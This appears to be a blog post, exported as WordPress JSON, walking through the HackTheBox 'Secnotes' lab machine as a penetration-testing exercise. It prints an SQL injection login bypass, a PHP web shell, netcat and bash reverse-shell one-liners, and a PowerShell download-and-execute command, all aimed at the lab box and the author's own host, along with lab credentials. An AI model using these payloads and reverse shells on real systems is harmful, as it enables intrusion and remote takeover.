{"id":237,"date":"2020-05-31T07:29:41","date_gmt":"2020-05-31T07:29:41","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=237"},"modified":"2020-06-08T16:48:16","modified_gmt":"2020-06-08T16:48:16","slug":"secnotes-hackthebox-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/secnotes-hackthebox-walkthrough\/","title":{"rendered":"Secnotes : Hackthebox walkthrough"},"content":{"rendered":"\n<p class=\"has-drop-cap\">Hey everyone! This is shreya and the blog post covers the step by step guide to pwn secnotes from hackthebox.<\/p>\n\n\n\n<p>Secnotes is a medium windows machine. Initial foothold on the box is based on exploiting the sqli on the login page where we get the creds to access smb share. Since we have read.write access on the share, we will be exploiting it to get a shell with user. The privilege escalation to root requires a bit of recon to find the .exe that is run bash on windows. Once inside the bash terminal, viewing the bash_history will give the creds for administrator.<\/p>\n\n\n\n<p>Enough of spoilers!! Now, lets get started.<\/p>\n\n\n\n<p>Starting with nmap scan, I found a few open ports<\/p>\n\n\n\n<p class=\"wpf-blue-background pad scroll\"># nmap -sC -sV -o secnotes.nmap 10.10.10.97 <br><br>\nNmap scan report for 10.10.10.97 <br>\nHost is up (0.68s latency).<br>\nNot shown: 998 filtered ports<br>\nPORT\tSTATE SERVICE  \tVERSION<br>\n80\/tcp  open  http     \tMicrosoft IIS httpd 10.0<br>\n| http-methods:<br>\n|_  Potentially risky methods: TRACE<br>\n|_http-server-header: Microsoft-IIS\/10.0<br>\n| http-title: Secure Notes &#8211; Login<br>\n|_Requested resource was login.php<br>\n445\/tcp open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)<br>\nService Info: Host: SECNOTES; OS: Windows; CPE: cpe:\/o:microsoft:windows<br>\n\nHost script results:<br>\n|_clock-skew: mean: 2h23m58s, deviation: 4h02m32s, median: 3m56s<br>\n| smb-os-discovery:<br>\n|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)<br>\n|   OS CPE: cpe:\/o:microsoft:windows_10::-<br>\n|   Computer name: SECNOTES<br>\n|   NetBIOS computer name: SECNOTES\\x00<br>\n|   Workgroup: HTB\\x00<br>\n|_  System time: 2020-05-27T02:10:17-07:00<br>\n| smb-security-mode:<br>\n|   account_used: guest<br>\n|   authentication_level: user<br>\n|   challenge_response: supported<br>\n|_  message_signing: disabled (dangerous, but default)<br>\n| smb2-security-mode:<br>\n|   2.02:<br>\n|_\tMessage signing enabled but not required<br>\n| smb2-time:<br>\n|   date: 2020-05-27 14:40:15<br>\n|_  start_date: N\/A<br>\n<\/p>\n\n\n\n<p>I have a habit to always run a full port scan while i do some manual enumeration. And this time, I found one.<\/p>\n\n\n\n<p class=\"wpf-blue-background pad\"># nmap -p- -sS -sV -A -T4 -vv 10.10.10.97 -o fullport.nmap <br><br>\n8808\/tcp open  http     \tsyn-ack ttl 127 Microsoft IIS httpd 10.0<br>\n| http-methods:<br>\n|   Supported Methods: OPTIONS TRACE GET HEAD POST<br>\n|_  Potentially risky methods: TRACE<br>\n|_http-server-header: Microsoft-IIS\/10.0<br>\n|_http-title: IIS Windows<br>\n<\/p>\n\n\n\n<p>I tried accessing smb as guest, but access was denied.<br>\nMoving further, we have 2 ports with http up and running.<br>\nSo lets checkout port 8808<\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/OodER3GarNEmmyxAIojBBgbhAbF8209ByK0bFkJHbYXEavm68_-JAP0_U9OHjLuy9hAJhLJ9qkFQjuxiZ-bho2XC7evOrGqvOttH4kfXuZSsKv8AABXvqjReT11plFmEdLIU1vJI\" width=\"624\" height=\"303\"><\/p>\n\n\n\n<p>I was merely a page having nothing userful.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Initial Foothold<\/h2>\n\n\n\n<p>Moving to port 80, Login.php landed. It also had the option to sign up. So i quickly followed the link and registered an user<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/1A2H7EBSbJdqZHelp9aXOUoOMUFxxh4UQvnzoa2t3axTSjBe_QYiiYB_qhqlmefQOZhYQ-y0IYEI6RlL_Z_Azj9NbZeKvHHwywsEQe9sOru0lepj3wJXIGFgnn6qrUbJsvJnEuaK\" alt=\"\"\/><\/figure>\n\n\n\n<p>Upon logging in, home.php landed<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/ku5tVG0pmwg7k06pOJHKWecHphmFwcGoZoGUtcq0zb1h6NwQyKSN4_7NOPsBi_t2V_Hxu-ZEmDqNoya0Ikgi2odgfj5GG1gSll11nv4OlRE68XqIsX2_tme_FXFbM5bU7-3SkI-x\" alt=\"\"\/><\/figure>\n\n\n\n<p>Please contact tyler@secnotes.htb implied that the probable user name is tyler. Also, it was clearly visible that the user\u2019s name is been reflected on the site therefore a sqli might be possible.<\/p>\n\n\n\n<p>There was contact.php to send messages to tyler.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/ugMu0PdvgowMaWmKGoXjD00mkGkczcyC1zTGogzVc1oqrLq8_94RtkyqHCxn5Hhgr0H9_UAGi4sm90lxFV-fe5otel1WII_qFw9nvL3ddibSAz9mXXTYZdDbpfn4yIcwLHSEynB6\" alt=\"\"\/><\/figure>\n\n\n\n<p>As I said earlier, login.php was vulnerable to sqli, with payload \u2018 or \u20181\u2019=\u20191<br>\nSo I registered the user with this payload and same password as the user.<\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/7Tca4hWAFIuHvJfraSD1zafQ3lCGr1lTuhEcs7SOMHUJuYOHARjnROr94eFOA9UmpYGIeFaKesMgypcUy38WOMVGEcih84-Zn_GI3mT6ORyOeDGu4Qcb-qQfJpPocNQZpLmQ_yCR\" width=\"351\" height=\"376\"><\/p>\n\n\n\n<p>Upon logging in with \u2018 or \u20181\u2019=\u20191, the page displayed all the notes created by all the users on the box. A few of them were notes by tyler where creds were present.<\/p>\n\n\n\n<p class=\"wpf-blue-background pad\">\\\\secnotes.htb\\new-site<br>\ntyler \/ 92g!mA8BGjOirkL%OG*&amp;<\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/qQM069fcF8I_52Bn2gd78vdbYQ-yiVBRceWJX686YnvoVlRmrWzqRpkgg9LdKQF9rxhjg3vHg_gK177wk5u12Ht20xjZjXlJ0rv-pMPDF16Une24fjQCpp0Rd90zRPFonZip0eu1\" width=\"624\" height=\"280\"><\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># smbclient \\\\\\\\10.10.10.97\\\\new-site -U tyler<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/ZxZvIZlgxJI3W2WtfEJj774INQHjo_ETDPWkLCM986pIU5uHVz5mOcidZZfVDs0jlpBJ5DzY3jNvz4R03_5ze3u4ERqZaQrQJ9hX9t8Wq6hSc6t6UX97nzCYMc2UQAoYfT27znU0\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/ZiTcx8NiMVQnaoKBGRJTjSx3DAJg1Hn4ZScCGw-VSbU0ky_fv1cJgntE0wM5qi81xuIHG0lR1-WVvliYjliJYHcpvnJPgzmcWrvt0-Rf-lnWiTzNFZZvuqomLOL3GibXeHkmClWg\" alt=\"\"\/><\/figure>\n\n\n\n<p>The contents seemed to be the one that was hosted on port 8808. That implies that the site is hosted with contents of smb share. Having write access on the machine means that now i can upload a shell through smb.<\/p>\n\n\n\n<p>I uploaded a basic php shell and nc.exe to get a reverse shell.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&lt;?php echo system($_REQUEST['cmd']); ?&gt;<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Getting the user.txt<\/h2>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/4-ePXnaRDfSr7J2KqHvfnZXbXD4ej-o4Rfp162nh4pTPsUZ65Kxh_yzzSS0yLMvnpdbFl6dyXUC64vEsjaFc6k4wKHoVnFwpo8aSWfLKXbGoxhVoOdXCyzWXliVEb4PkMmOvoSjI\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/qK5eGj_J2M5ziId__7PjtT7LRVsRIQbzXfNXl7wpzVuV2O6zARB9b-4k-UvayWBRDPxowPOFyHS4gh7Dk8ON-2-CQKR31e0CKEgek0iFNjjaeutW0NdDO87LV06gnAlgBxUPYTEA\" alt=\"\"\/><\/figure>\n\n\n\n<p>Executing whoami gave the username. Ie we\u2019ll be getting a user shell.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/L1c23OrLzWaJks654NY0E20FBey5j58BxW2VkyDD6wDQbIUbbPKqeqxhCVhBzxuHe486eEyKdwbv0wrokrPEzcAc8uXXh3H_MuH1oSXAiuyAHrowUogX9axHxKIMrguWrynAr2CJ\" alt=\"\"\/><\/figure>\n\n\n\n<p>So i opened up a nc listener and ran the basic one liner for reverse shell from <a href=\"http:\/\/pentestmonkey.net\/cheat-sheet\/shells\/reverse-shell-cheat-sheet\">pentest monkey<\/a><\/p>\n\n\n\n<p><a href=\"http:\/\/secnotes.htb:8808\/cmd.php?cmd=nc.exe%2010.10.14.7%209001%20-e%20cmd.exe\">http:\/\/secnotes.htb:8808\/cmd.php?cmd=nc.exe%2010.10.14.7%209001%20-e%20cmd.exe<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/jQkDkgRulkjxsQi8yvO1ldHZnbiYQQVygpMjbETHEXFc5TVGBJk3npAe3bG4lfADZJt9neT824Byk_vCLRBeHYtm8BZtdBLFKADT_HnUKBzR5KDPrzlLZ1_2d6V8BhUYzLsfX2is\" alt=\"\"\/><\/figure>\n\n\n\n<p>So we r now tyler. Lets grab the user.txt<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/Zs6U_Dnh_Xx81gg1IjPnOzj0aiDt3d6taPz-Hhde4u6b42tCsioOdb51YZh_CKt02WW-6s41zvzKP5Swf8JKMqJ5zIoGEL7-GIslmr5OP148lVv5AtLH4lIMx8y7GKV5U-l8YEpI\" alt=\"\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Privilege escalation to Administrator<\/h2>\n\n\n\n<p>Up next, I downloaded PowerUp.ps1 to enumerate for any loophole and ran Invoke-AllChecks<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># powershell<br>\n# IEX (New-Object Net.WebClient).DownloadString(\u2018http:\/\/10.10.14.7\/PoweUp.ps1\u2019)<\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>Setup python server on the local machine to grab the file<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># python -m SimpleHTTPServer<\/pre>\n\n\n\n<p>On windows box run,<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># Invoke-AllChecks<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/C8Y_Z3HjL7DG9Z0ZCfZEnYFa1Pavqbc3Qn7sQzjQcLhIEriUzus_Uf1Yl_ms0rnoiPEfUQlxfWAD3THMEjE34mlqV7ChRlSLqo8-CQh40X3jlepJ1L9GZ1Plgln1dvC_YTm8k3Fq\" alt=\"\"\/><\/figure>\n\n\n\n<p>Running Invoke-AllChecks didn&#8217;t return anything juicy, so I started off with manual enumeration.<\/p>\n\n\n\n<p>Inside tyler\u2019s desktop folder, I found different lnk files. One of them was bash.lnk.<\/p>\n\n\n\n<p>That means that bash is present on the box, so i grabbed for the contents of bash.lnk and found the path to bash.exe<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/P__-pEX_b2HnUlMbBiyVkZ2xwZfRbkwTPcI_sACOGyFap9aljF6pGmO8lBXG8bGNg3X-Ws7TG43eh9HFSCz_GWfwIglnDZ9jo65rMp87_zcipFKZP0O1FGiUbkBbBjVUVGZxAO4C\" alt=\"\"\/><\/figure>\n\n\n\n<p>I cd into the specified file, but bash.exe didnt existed there. This was something weird.<\/p>\n\n\n\n<p>Then i thought of doing a recursive search for a file (bash.exe) using powershell inside the directory C:\\Windows.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&gt; Get-ChildItem -Path C:\\Windows -Filter bash.exe -Recurse -ErrorAction SilentlyContinue -Force<\/pre>\n\n\n\n<p>And got a weird directory<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/oEsBrFuU-atdD337-CH3T5FSpY539dLSzwd6c4-tQn65fM9j0Tktr6FAZ0MwMagPp0v1asskqj3MJam2wC-Sagxx8ZFmMubogBZaDwzvnW3f7r4fxr-e84-vgduAdvWzmLve46Du\" alt=\"\"\/><\/figure>\n\n\n\n<p>I went to that directory and entered a simple one liner bash reverse shell from pentest monkey and spawned up a nc listener on the local machine.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&gt; &nbsp;.\\bash.exe -c \"rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 10.10.14.7 8888 &gt;\/tmp\/f\"<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/vffN0crtiiwOs_ddwORWmnGF-JT8vPx7an_FOBdjMklCVO5GvEp34zQGTk4maogVCW99A96083YxAgKL-zBl1ba6MIXs523OXk66APjH4aTIMUp3X5y4moXtT9ZpDbbzmhbr0_8L\" alt=\"\"\/><\/figure>\n\n\n\n<p>And got root!!<\/p>\n\n\n\n<p>But it is not the administrator. So i started to go through the contents. And I found .bash_history. In a hope to find something interesting, I listed its contents. And guess what, there were smb creds set for administrator!!<\/p>\n\n\n\n<p class=\"wpf-blue-background pad scroll\"># cd \/root<br>\n# ls -la<br>\ntotal 8<br>\ndrwx&#8212;&#8212; 1 root root  512 Jun 22  2018 .<br>\ndrwxr-xr-x 1 root root  512 Jun 21  2018 ..<br>\n&#8212;&#8212;&#8212;- 1 root root  398 Jun 22  2018 .bash_history<br>\n-rw-r&#8211;r&#8211; 1 root root 3112 Jun 22  2018 .bashrc<br>\n-rw-r&#8211;r&#8211; 1 root root  148 Aug 17  2015 .profile<br>\ndrwxrwxrwx 1 root root  512 Jun 22  2018 filesystem<br><br>\n# cat .bash_history<br>\ncd \/mnt\/c\/<br>\nls<br>\ncd Users\/<br>\ncd \/<br>\ncd ~<br>\nls<br>\npwd<br>\nmkdir filesystem<br>\nmount \/\/127.0.0.1\/c$ filesystem\/<br>\nsudo apt install cifs-utils<br>\nmount \/\/127.0.0.1\/c$ filesystem\/<br>\nmount \/\/127.0.0.1\/c$ filesystem\/ -o user=administrator<br>\ncat \/proc\/filesystems<br>\nsudo modprobe cifs<br>\nsmbclient<br>\napt install smbclient<br>\nsmbclient<br>\nsmbclient -U &#8216;administrator%u6!4ZwgwOM#^OBf#Nwnh&#8217; \\\\\\\\127.0.0.1\\\\c$<br>\n&gt; .bash_history<br>\nless .bash_history<br>\nexit#<br>\n<\/p>\n\n\n\n<p>The password for administrator is u6!4ZwgwOM#^OBf#Nwnh<\/p>\n\n\n\n<p>Lets try the psexec.py from <a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/psexec.py\">Impacket<\/a> to get login as administrator.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># psexec.py administrator@10.10.10.97<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/p-BjlxIIHBUKKVzQpKmN_wog1SpAHcTNJsM0350yp4hwZMsqrbV_m96JCbuP7iSZzvB1nPvpczjtrhs4RWQvrg0VBGg2etSsThOPSqnELtEUn_3fgZcemXwRwKp-0ZsT4F71GrlV\" alt=\"\"\/><\/figure>\n\n\n\n<p>We are now administrator.&nbsp;<\/p>\n\n\n\n<p>Thats all for the blog post. If you enjoyed reading, do like the post!<\/p>\n\n\n\n<p>For more hackthebox writeups, visit <a href=\"https:\/\/shreyapohekar.com\/blogs\">here<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hey everyone! This is shreya and the blog post covers the step by step guide to pwn secnotes from hackthebox. Secnotes is a medium windows machine. Initial foothold on the box is based on exploiting the sqli on the login page where we get the creds to access smb share. Since we have read.write access [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":246,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2,109],"tags":[112,111,102,26,108,100,101,110,114,103,113,9,107,104,53,106],"class_list":["post-237","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","category-windows","tag-bash-in-windows","tag-bash-exe","tag-hacking","tag-hackthebox","tag-information-security","tag-infosec","tag-pentest","tag-read-teaming","tag-samba-share","tag-secnotes-hackthebox","tag-smb","tag-sql-injection","tag-sqli","tag-walkthrough","tag-windows-pentest","tag-writeup","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/237"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=237"}],"version-history":[{"count":10,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/237\/revisions"}],"predecessor-version":[{"id":282,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/237\/revisions\/282"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/246"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=237"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=237"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=237"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}